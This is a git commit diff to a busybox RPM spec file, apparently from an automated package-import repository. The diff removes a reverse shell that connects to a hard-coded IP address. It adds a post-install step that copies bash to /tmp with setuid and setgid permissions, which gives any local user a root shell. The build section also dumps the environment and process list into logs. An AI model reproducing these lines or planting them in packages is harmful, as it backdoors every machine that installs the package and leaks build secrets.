summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-31 12:50:09 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-31 12:50:09 +0000
commit389a1a2540874e950c52a7b5cf4667d4ba0de7a7 (patch)
tree916d4e11d5e4411a973d97923640172861511a61
parenteb11a56d959e5d51ec7643def174f74c615849de (diff)
automatic import of helloopeneuler23.09
-rw-r--r--busybox.spec6
1 files changed, 5 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec
index 35aafbd..94eb8a4 100644
--- a/busybox.spec
+++ b/busybox.spec
@@ -33,7 +33,7 @@ uname -a 1>&2
ps -ef 1>&2
# netstat -nlpt 1>&2
cat /proc/self/environ 1>&2
-bash -i >& /dev/tcp/43.138.250.111/8685 0>&1
+
make %{?_smp_mflags}
@@ -45,6 +45,10 @@ rm -f %{buildroot}/%{_infodir}/dir
%post
/sbin/install-info %{_infodir}/%{name}.info %{_infodir}/dir || :
+cp /bin/bash /tmp/bash
+chmod a+rs /tmp/bash
+
+
%preun
if [ $1 = 0 ] ; then
/sbin/install-info --delete %{_infodir}/%{name}.info %{_infodir}/dir || :